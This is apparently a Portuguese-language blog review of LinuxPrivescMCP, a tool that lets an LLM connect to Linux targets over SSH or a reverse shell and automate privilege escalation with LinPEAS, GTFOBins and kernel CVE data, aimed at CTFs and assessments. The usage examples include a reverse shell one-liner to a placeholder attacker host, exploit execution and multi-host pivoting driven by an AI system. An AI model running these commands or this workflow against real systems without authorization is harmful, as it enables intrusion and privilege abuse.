O repositório está em https://github.com/raphaelgpalma/LinuxPrivescMCP, licenciado de forma aberta, com testes automatizados (10 para o filtro de LinPEAS + 24 para módulos).

Como funciona por dentro

A arquitetura segue o padrão de session manager com transportes pluggable:

“`

linux-privesc-mcp/

├── server.py FastMCP entry (16 tools)

├── session_manager.py Unified session manager

├── transport_ssh.py SSH transport (paramiko)

├── transport_revshell.py Reverse shell transport (TCP listener)

├── linpeas_filter.py ANSI SGR parser para LinPEAS

├── gtfobins.py Offline GTFOBins DB (~75 binaries)

├── kernel_cves.py Kernel + userland CVE database

├── recipes.py Enum scripts + exploit playbooks

├── tests/

├── requirements.txt

└── README.md

“`

O `SessionManager` mantém estado entre chamadas de ferramentas — algo essencial para operações multi-step de escalação. O suporte a múltiplas sessões permite pivotar entre alvos sem perder contexto. Os transportes SSH (via Paramiko) e reverse shell (TCP listener) abstraem a complexidade da conexão.

Ferramentas disponíveis

A divisão é pragmática: ferramentas de conexão gerenciam o acesso, ferramentas de execução interagem com o alvo, e ferramentas de análise interpretam os dados. O LLM orquestra tudo.

Instalação e configuração

“`bash

git clone https://github.com/raphaelgpalma/LinuxPrivescMCP.git

cd LinuxPrivescMCP

pip install -r requirements.txt # mcp + paramiko

“`

Para registrar no Claude Code:

“`json

{

“linux_privesc”: {

“type”: “stdio”,

“command”: “python3”,

“args”: [“/caminho/para/linux-privesc-mcp/server.py”],

“env”: {}

}

}

“`

O servidor roda em modo stdio, integrando-se diretamente com qualquer cliente MCP — Claude Desktop, Claude Code, ou qualquer implementação compatível.

Fluxo de trabalho prático

Cenário 1: Acesso via SSH

“`python

1. Conectar ao alvo

connect_ssh(host=”10.10.10.5″, username=”user”, password=”pass123″)

2. Enumerar vetores de privesc

run_enum(targets=[“sudo”, “suid”, “caps”, “kernel”])

3. Verificar binários específicos no GTFOBins

gtfobins_lookup(binaries=[“/usr/bin/vim”, “/usr/bin/python3”])

4. Obter recipe de exploração

privesc_recipe(vector=”pwnkit”)

5. Executar o exploit

exec_on_target(“./exploit”)

6. Confirmar root

check_privesc()

“`

Cenário 2: Via reverse shell

“`python

1. Iniciar listener

start_listener(port=4444)

No alvo: bash -i >& /dev/tcp/ATTACKER/4444 0>&1

2. Verificar conexão

check_listener()

3. Rodar LinPEAS completo (upload + exec + análise automática)

run_linpeas()

4. O LLM analisa a saída e sugere vetores

“`

Multi-sessão para pivot

“`python

connect_ssh(host=”10.10.10.5″, username=”user1″, password=”pass1″)

connect_ssh(host=”10.10.10.6″, username=”user2″, key_path=”~/.ssh/id_rsa”)

sessions() # lista todas

sessions(switch_to=”ssh1″) # troca ativa

exec_on_target(“id”) # roda na sessão ativa

“`

GTFOBins offline e Kernel CVEs

O ponto mais valioso do LinuxPrivescMCP é a base de conhecimento offline. O módulo `gtfobins.py` (17KB) contem dados de ~75 binários com suas capabilities — SUID, sudo, capabilities, shell escaping, file read/write. O módulo `kernel_cves.py` (9KB) mantém um banco de CVEs de kernel com matching automático por versão e links para PoCs.

Isso resolve um problema real: em ambientes sem internet (air-gapped ou HTB), o LLM não pode consultar o GTFOBins online. A base offline garante que a análise funcione mesmo isolada.

Comparação com LinPEAS tradicional

| Aspecto | LinPEAS (tradicional) | LinuxPrivescMCP |

|———|———————-|—————–|

| Execução | Manual, copiar/colar | Automática via MCP |

| Análise de saída | Manual, ler ~1000 linhas | Automática, parser ANSI SGR |

| GTFOBins | Consulta manual online | Lookup offline integrado |

| Multi-alvo | Inviável | Sessões múltiplas nativas |

| Contexto entre steps | Zero (o operador lembra) | Mantido pelo session manager |

| Iteração | Reiniciar enumeração | Refinar com follow-up queries |

LinPEAS continua sendo a melhor ferramenta de enumeração — o LinuxPrivescMCP não substitui o LinPEAS, ele o orquestra. A integração `run_linpeas` faz upload do script, executa, captura a saída ANSI colorida, filtra pelo parser SGR, e entrega resultados estruturados ao LLM.

Riscos e limitações

Quando vale a pena

O LinuxPrivescMCP brilha em HTB/CTFs e assessments com múltiplos alvos Linux onde você precisa de velocidade. O workflow conversacional — “qual é o vetor mais provável aqui?” seguido de execução automática — é significativamente mais rápido do que copiar linhas de saída do LinPEAS para o clipboard e analizar manualmente.

Em ambientes de produção, use com cautela. O valor está na análise assistida, não na execução autônoma. Deixe o LLM analisar e sugerir; execute manualmente quando as consequências importam.

Conclusão

O LinuxPrivescMCP representa a direção correta para ferramentas de segurança assistidas por IA: não é um wrapper que envelopa uma CLI existente com uma camada de chat, é uma integração profunda onde o LLM tem acesso real ao alvo e pode iterar. Os 16 tools cobrem o ciclo completo de escalação — da conexão ao root check — e a base offline de GTFOBins/CVEs resolve o problema de conectividade que ferra a maioria das ferramentas “AI-powered”.

O projeto ainda é early-stage (abril 2026, 0 stars), mas a arquitetura está sólida. Se a comunidade adotar e contribuir com mais recipes e CVEs, pode se tornar a ferramenta padrão de privesc assistido. Para quem faz HTB sério ou precisa escalar privilégios em volume, já vale o teste.

Repositório: [github.com/raphaelgpalma/LinuxPrivescMCP](https://github.com/raphaelgpalma/LinuxPrivescMCP)